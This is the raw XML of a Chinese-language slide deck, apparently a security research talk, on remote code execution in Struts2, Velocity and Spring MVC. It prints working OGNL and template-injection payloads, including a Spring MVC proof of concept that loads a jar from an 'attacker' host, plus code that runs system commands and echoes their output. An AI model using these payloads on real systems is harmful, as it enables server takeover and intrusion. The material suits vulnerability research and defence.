                        <a:rPr lang="en-US" sz="4800" b="0" kern="1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result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4800" b="0" kern="1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en-US" sz="48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name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" b="0" kern="1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testloadfilepath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="48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"&gt;${</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" b="0" kern="100" dirty="0" err="1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testloadfilepath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4800" b="0" kern="1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}&lt;/result&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="4800" b="0" kern="1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1" marR="68581" marT="0" marB="0"/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9833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8496944" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>提高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>自定的页面漏洞的发现率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/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某次看到一个用户登录系统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Inputpage=xxxx.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>错误处理结果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Inputpage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>错误处理之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一般是重新提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Jsp,vm…etc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75499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 XSLT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>本地代码执行</a:t>
            </a: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57338"/>
            <a:ext cx="7704137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40933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velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码执行（没有报告）</a:t>
            </a:r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>
          <a:xfrm>
            <a:off x="841374" y="1497013"/>
            <a:ext cx="7907089" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JPG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>#set ($exec = "kxlzx")</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$exec.class.forName("java.lang.Runtime").getRuntime().exec("calc")</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>showcase/context.vm?layout=../z.gif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61353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Velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>远程代码执行</a:t>
            </a:r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resin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>服务器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log/access.log</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="E:\doc\my\myresearch\x\velocity remote\packet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7200"/>
            <a:ext cx="914400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E:\doc\my\myresearch\x\velocity remote\packet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8313"/>
            <a:ext cx="91440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E:\doc\my\myresearch\x\velocity remote\success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763270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691135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Velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>远程代码执行</a:t>
            </a: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log/access.log</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60420" name="图片 3" descr="E:\doc\my\myresearch\x\velocity remote\log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109788"/>
            <a:ext cx="7920038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9750" y="2492375"/>
            <a:ext cx="7561263" cy="7921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750" y="3921125"/>
            <a:ext cx="7920038" cy="7921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71352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鸡肋变绝杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>章节</a:t>
            </a:r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Q &amp; A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5594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从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>到完美和谐的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目录</a:t>
            </a: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b="1" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>CVE-2011-3923</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>）的局限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>无法回显</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>回显研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>回显研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>回显研究</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（感谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>wofeiwo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>提醒）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50859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WEB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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2771775" y="1236663"/>
            <a:ext cx="6192838" cy="2663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altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>STRUTS2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>turbine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>JSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>DWR…etc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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950" y="1236663"/>
            <a:ext cx="1223963" cy="429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USER</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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1403350" y="1811338"/>
            <a:ext cx="1223963" cy="433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59113" y="2568575"/>
            <a:ext cx="1657350" cy="1042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action1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40313" y="2568575"/>
            <a:ext cx="1655762" cy="1042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action2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92950" y="2568575"/>
            <a:ext cx="1655763" cy="1042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action3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71775" y="4548188"/>
            <a:ext cx="6192838" cy="1617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1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"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Velocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、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freemarker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、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JSP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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16238" y="4676775"/>
            <a:ext cx="2609850" cy="615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template1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3100" y="4681538"/>
            <a:ext cx="2563813" cy="615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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>template2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="36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5724525" y="4010025"/>
            <a:ext cx="360363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14" name="左箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="4714875"/>
            <a:ext cx="1223963" cy="4476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73048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远程代码执行的局限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491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http://www.inbreak.net/foo.action?foo=aaaaaaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979613" y="1484313"/>
            <a:ext cx="5400675" cy="5113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public class FooAction {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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    </a:t>
            </a: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private String foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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    </a:t>
            </a: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public String execute() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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        </a:t>
            </a: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return "success";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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    </a:t>
            </a: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public String getFoo() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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        </a:t>
            </a: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return foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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    </a:t>
            </a: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public void setFoo(String foo) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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        </a:t>
            </a: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this.foo = foo;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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83285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远程代码执行的局限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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>
          <a:xfrm>
            <a:off x="0" y="1497013"/>
            <a:ext cx="9036496" cy="4525962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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>action?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=(#context["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xwork.MethodAccessor.denyMethodExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"]= new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>java.lang.Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(false), #_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>memberAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowStaticMethodAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"]= new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>java.lang.Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(true), @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>java.lang.Runtime@getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>().exec('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/PWNAGE'))(meh)&amp;z[(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" b="1" dirty="0" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)('meh')]=true</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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8523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远程代码执行的局限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412776"/>
            <a:ext cx="8362950" cy="4525962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Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>class.classLoader.URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[0]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>jar:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>://attacker/spring-exploit.jar!/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>org.apache.catalina.loader.WebappClassLoader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URLs		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>jarPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>		String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033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远程代码执行的局限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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>
          <a:xfrm>
            <a:off x="-108520" y="1497013"/>
            <a:ext cx="9145016" cy="4525962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http://www.inbreak.net/t1.action?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>class.classLoader.jarPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=(XXXX,@java.lang.Runtime@getRuntime().exec('calc'))(meh)&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>class.classLoader.jarPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)(0)=false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6473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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675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执行结果出现在输入框</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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9500"/>
            <a:ext cx="91440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859338" y="3141663"/>
            <a:ext cx="3744912" cy="5032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70923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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4700" dirty="0" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\u003d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4700" b="1" dirty="0" err="1"/>
              <a:t>ognl.Ognl@getValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("\u0023a\u003d@java.lang.Runtime@getRuntime().exec('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>getInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()\u002c\u0023b\u003dnew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.io.InputStreamReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(\u0023a)\u002c\u0023c\u003dnew </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.io.BufferedReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(\u0023b)\u002c\u0023d\u003d\u0023c.readLine()\u002c\u0023d\u003d\u0023d\u002b\u0023c.readLine()\u002b'\n'\u002c\u0023d\u003d\u0023d\u002b\u0023c.readLine()\u002b'\n'\u002c\u0023d\u003d\u0023d\u002b\u0023c.readLine()\u002b'\n'\u002c\u0023d\u003d\u0023d\u002b\u0023c.readLine()\u002b'\n'\u0023d\u003d\u0023d\u002b\u0023c.readLine()"\u002c@ognl.Ognl@createDefaultContext(null)\u002c""\u002c@java.lang.String@class)))=1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71194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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696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执行结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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2420938"/>
            <a:ext cx="8982075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9394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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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t1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" smtClean="0"/>
              <a:t>!getFoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.action?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" smtClean="0"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>=aaa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7066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335213"/>
            <a:ext cx="799306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668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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>（背后的技术）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716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t1!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>getFoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.action</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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903288" y="2205038"/>
            <a:ext cx="7129462" cy="1511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public String getFoo() {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1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	return foo;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
